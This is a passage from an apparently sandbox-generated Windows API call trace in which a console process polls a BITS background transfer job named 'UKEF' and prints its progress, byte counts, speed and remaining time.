| out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0035.625] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0035.625] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="5840") returned 4 [0035.625] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="196608") returned 6 [0035.625] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="2") returned 1 [0035.625] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eeb30 | out: lpSystemTimeAsFileTime=0x1eeb30*(dwLowDateTime=0x1b2b5430, dwHighDateTime=0x1d38a44)) [0035.625] _finite (_X=0x1eeb30) returned 1 [0035.625] _finite (_X=0x7ff0000000000000) returned 1 [0035.625] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0035.625] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x14) returned 1 [0035.625] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0035.625] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0035.625] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xf) returned 1 [0035.626] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0035.626] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1ee888 | out: _Buffer="545.94 B/S") returned 10 [0035.626] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0035.626] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xb) returned 1 [0035.626] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0035.626] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0035.626] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x10) returned 1 [0035.626] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0035.627] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%I64u Minutes", _ArgList=0x1ee888 | out: _Buffer="6 Minutes") returned 9 [0035.627] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeaf0 | out: lpConsoleScreenBufferInfo=0x1eeaf0) returned 1 [0035.627] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x1eeb30, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb30*=0x9) returned 1 [0035.627] CoTaskMemFree (pv=0x276f30) [0035.627] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0035.627] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0041.774] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0041.774] TranslateMessage (lpMsg=0x1efa28) returned 0 [0041.774] DispatchMessageW (lpMsg=0x1efa28) returned 0x1 [0041.775] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0041.775] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0041.775] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fca [0041.775] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1eebc8 | out: pVal=0x1eebc8) returned 0x0 [0041.776] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0041.776] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1eebd0 | out: pVal=0x1eebd0) returned 0x0 [0041.777] CoTaskMemFree (pv=0x0) [0041.777] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1eebd8 | out: pVal=0x1eebd8*="UKEF") returned 0x0 [0041.777] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0041.778] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1eeb38 | out: lpNumberOfCharsWritten=0x1eeb38) returned 1 [0041.780] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1eeb38 | out: lpNumberOfAttrsWritten=0x1eeb38) returned 1 [0041.780] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1 [0041.780] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0041.780] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.780] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0041.780] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0041.780] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.780] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0041.781] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0041.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.781] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x7) returned 1 [0041.781] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0041.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.781] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0041.781] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0041.782] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.782] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0041.782] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0041.782] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.782] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xe) returned 1 [0041.782] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0041.782] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.782] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0041.783] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0041.783] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.783] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x6) returned 1 [0041.783] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0041.783] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.783] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0041.783] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0041.784] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0041.784] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="1") returned 1 [0041.784] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.784] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0041.785] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0041.785] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0041.785] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0041.785] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0041.785] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="18213") returned 5 [0041.785] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="196608") returned 6 [0041.785] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="9") returned 1 [0041.785] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eeb30 | out: lpSystemTimeAsFileTime=0x1eeb30*(dwLowDateTime=0x1ed79350, dwHighDateTime=0x1d38a44)) [0041.785] _finite (_X=0x1eeb30) returned 1 [0041.785] _finite (_X=0x7ff0000000000000) returned 1 [0041.785] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0041.785] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x15) returned 1 [0041.785] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0041.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0041.786] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xf) returned 1 [0041.786] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0041.786] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x1ee888 | out: _Buffer="1.53 KB/S") returned 9 [0041.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0041.786] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xa) returned 1 [0041.786] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0041.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0041.786] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x10) returned 1 [0041.787] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0041.787] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%I64u Minutes", _ArgList=0x1ee888 | out: _Buffer="2 Minutes") returned 9 [0041.787] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeaf0 | out: lpConsoleScreenBufferInfo=0x1eeaf0) returned 1 [0041.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x1eeb30, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb30*=0x9) returned 1 [0041.787] CoTaskMemFree (pv=0x276f30) [0041.787] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0041.787] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0042.782] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0042.782] KillTimer (hWnd=0x0, uIDEvent=0x7fca) returned 1 [0042.782] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0042.782] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0047.387] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0047.387] TranslateMessage (lpMsg=0x1efa28) returned 0 [0047.387] DispatchMessageW (lpMsg=0x1efa28) returned 0x1 [0047.387] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0047.387] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0047.389] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc9 [0047.389] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1eebc8 | out: pVal=0x1eebc8) returned 0x0 [0047.390] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0047.391] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1eebd0 | out: pVal=0x1eebd0) returned 0x0 [0047.391] CoTaskMemFree (pv=0x0) [0047.391] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1eebd8 | out: pVal=0x1eebd8*="UKEF") returned 0x0 [0047.392] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0047.392] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1eeb38 | out: lpNumberOfCharsWritten=0x1eeb38) returned 1 [0047.392] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1eeb38 | out: lpNumberOfAttrsWritten=0x1eeb38) returned 1 [0047.392] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1 [0047.392] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0047.392] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.393] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0047.393] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0047.393] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.393] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0047.393] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0047.393] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.393] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x7) returned 1 [0047.393] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0047.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.394] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0047.394] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0047.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.394] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0047.394] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0047.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.395] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xe) returned 1 [0047.395] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0047.395] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.395] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0047.395] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0047.395] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.395] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x6) returned 1 [0047.395] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0047.396] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.396] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0047.396] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0047.396] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0047.396] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="1") returned 1 [0047.396] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.396] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0047.396] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0047.396] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0047.397] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0047.397] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0047.397] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="40098") returned 5 [0047.397] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="196608") returned 6 [0047.397] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="20") returned 2 [0047.397] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eeb30 | out: lpSystemTimeAsFileTime=0x1eeb30*(dwLowDateTime=0x222e20f0, dwHighDateTime=0x1d38a44)) [0047.397] _finite (_X=0x1eeb30) returned 1 [0047.397] _finite (_X=0x7ff0000000000000) returned 1 [0047.397] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0047.397] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x16) returned 1 [0047.397] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0047.397] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0047.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xf) returned 1 [0047.398] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0047.398] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x1ee888 | out: _Buffer="3.13 KB/S") returned 9 [0047.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0047.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xa) returned 1 [0047.398] SetConsoleTextAttribute (hConsoleOutput=0x7, 